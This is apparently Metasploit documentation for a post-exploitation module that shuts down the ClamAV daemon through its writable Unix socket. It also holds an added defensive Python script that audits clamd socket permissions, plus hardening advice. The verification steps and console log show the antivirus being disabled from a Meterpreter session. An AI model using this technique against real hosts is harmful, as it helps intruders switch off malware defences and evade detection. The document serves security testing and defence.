metasploit-gs/documentation/modules/post/linux/manage/disable_clamav.md
2023-10-10 14:46:18 -04:00

## Description
This module shuts down the ClamAV service on a Linux host.
ClamAV exposes a Unix socket through which non-privileged users can interact with the ClamAV daemon via utilities such as "clamscan".
The daemon requires no additional checks before acting on a shutdown request sent over that socket, so any user who can write to the socket can stop the service.
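A defender's counterpart to the module's precondition (the socket exists and is writable by the current user), added here as an example that is neither the module's code nor ClamAV's: it parses a clamd.conf for the LocalSocket, LocalSocketGroup and LocalSocketMode options and reports whether the socket is exposed to every local user, and it can stat the socket on disk to confirm the effective permissions. The two sample configurations are constructed; treating an unset LocalSocketMode as world-accessible follows the description of the default in clamd.conf.sample and is an assumption of this script.

```python
"""Audit clamd's local socket exposure (added example, not ClamAV or Metasploit code)."""
import os
import stat
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Path used by the module's CLAMAV_UNIX_SOCKET option (Debian/Ubuntu default).
DEFAULT_SOCKET = "/run/clamav/clamd.ctl"


@dataclass
class SocketFinding:
    path: Optional[str]          # LocalSocket value, None if no local socket configured
    mode: Optional[int]          # LocalSocketMode as an int, None if unset
    group: Optional[str]         # LocalSocketGroup value, None if unset
    risks: List[str] = field(default_factory=list)


def parse_clamd_conf(text: str) -> Dict[str, str]:
    """Parse clamd.conf-style text: 'Option value' per line, '#' starts a comment.
    Repeated options keep the last value (sufficient for the socket options)."""
    opts: Dict[str, str] = {}
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()   # assumes no '#' inside values
        if not line:
            continue
        parts = line.split(None, 1)
        opts[parts[0]] = parts[1].strip() if len(parts) > 1 else ""
    return opts


def assess_conf(text: str) -> SocketFinding:
    """Report who the configuration lets talk to clamd over its Unix socket."""
    opts = parse_clamd_conf(text)
    path = opts.get("LocalSocket")
    if path is None:
        return SocketFinding(path=None, mode=None, group=None)
    mode_str = opts.get("LocalSocketMode")
    mode = int(mode_str, 8) if mode_str else None
    group = opts.get("LocalSocketGroup")
    risks: List[str] = []
    if mode is None:
        # Assumption: clamd leaves the socket world-accessible when no mode is set.
        risks.append("LocalSocketMode unset: socket is world-accessible by default")
    else:
        if mode & stat.S_IWOTH:
            risks.append(f"LocalSocketMode {mode:04o} grants write to all users")
        if mode & stat.S_IWGRP and group is None:
            risks.append("group-writable but LocalSocketGroup unset: "
                         "clamd's primary group decides who can send commands")
    return SocketFinding(path=path, mode=mode, group=group, risks=risks)


def assess_socket_file(path: str = DEFAULT_SOCKET) -> Dict[str, object]:
    """Stat the socket on disk; this is the check that matters at runtime."""
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return {"exists": False}
    return {
        "exists": True,
        "is_socket": stat.S_ISSOCK(st.st_mode),
        "mode": stat.S_IMODE(st.st_mode),
        "world_writable": bool(st.st_mode & stat.S_IWOTH),
        "writable_by_me": os.access(path, os.W_OK),  # the module's own precondition
    }


# Constructed sample configurations: the exposed default beside a restricted one.
WEAK_CONF = "LocalSocket /run/clamav/clamd.ctl\n"
HARDENED_CONF = (
    "LocalSocket /run/clamav/clamd.ctl\n"
    "LocalSocketGroup clamav   # only members of this group may connect\n"
    "LocalSocketMode 660\n"
)


def demo() -> Dict[str, SocketFinding]:
    return {"weak": assess_conf(WEAK_CONF), "hardened": assess_conf(HARDENED_CONF)}


if __name__ == "__main__":
    for name, finding in demo().items():
        print(f"{name}: {finding.path} mode={finding.mode} group={finding.group}")
        for r in finding.risks:
            print(f"  [!] {r}")
    print("on-disk:", assess_socket_file())
```

Restricting the socket to a dedicated group and adding only the accounts that need to run clamdscan removes the precondition the module relies on; a clamd process that disappears from the process list while the service is still enabled is the signal to alert on.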
## Verification Steps
### Shutting off ClamAV
1. Launch `msfconsole`
2. Get a Meterpreter shell on a Linux host that is also running ClamAV.
3. Do: `use post/linux/manage/disable_clamav`
4. Do: `set SESSION <session number on the Linux host>`
5. Do: `exploit -j`
6. The daemon should be shut off.
## Scenarios
```
msf6 post(linux/manage/disable_clamav) > sessions

Active sessions
===============

  Id  Name  Type                   Information               Connection
  --  ----  ----                   -----------               ----------
  4         meterpreter x86/linux  dllcoolj @ 192.168.130.1  127.0.0.1:4444 -> 127.0.0.1:38360 (127.0.0.1)

msf6 post(linux/manage/disable_clamav) > show options

Module options (post/linux/manage/disable_clamav):

   Name                Current Setting        Required  Description
   ----                ---------------        --------  -----------
   CLAMAV_UNIX_SOCKET  /run/clamav/clamd.ctl  yes       ClamAV unix socket
   SESSION             4                      yes       The session to run this module on


View the full module info with the info, or info -d command.

msf6 post(linux/manage/disable_clamav) > ps -ef | grep 'clamd'
[*] exec: ps -ef | grep 'clamd'

clamav    132021       1 16 18:51 ?        00:00:09 clamd
dllcoolj  132533   71177  0 18:52 pts/3    00:00:00 sh -c ps -ef | grep 'clamd'
dllcoolj  132535  132533  0 18:52 pts/3    00:00:00 grep clamd
msf6 post(linux/manage/disable_clamav) > exploit -j
[*] Post module running as background job 10.
msf6 post(linux/manage/disable_clamav) >
[*] Checking file path /run/clamav/clamd.ctl exists and is writable...
[+] File does exist and is writable!
[*] Shutting down ClamAV!
msf6 post(linux/manage/disable_clamav) > ps -ef | grep 'clamd'
[*] exec: ps -ef | grep 'clamd'

dllcoolj  132927  132925  0 18:52 pts/3    00:00:00 grep clamd
```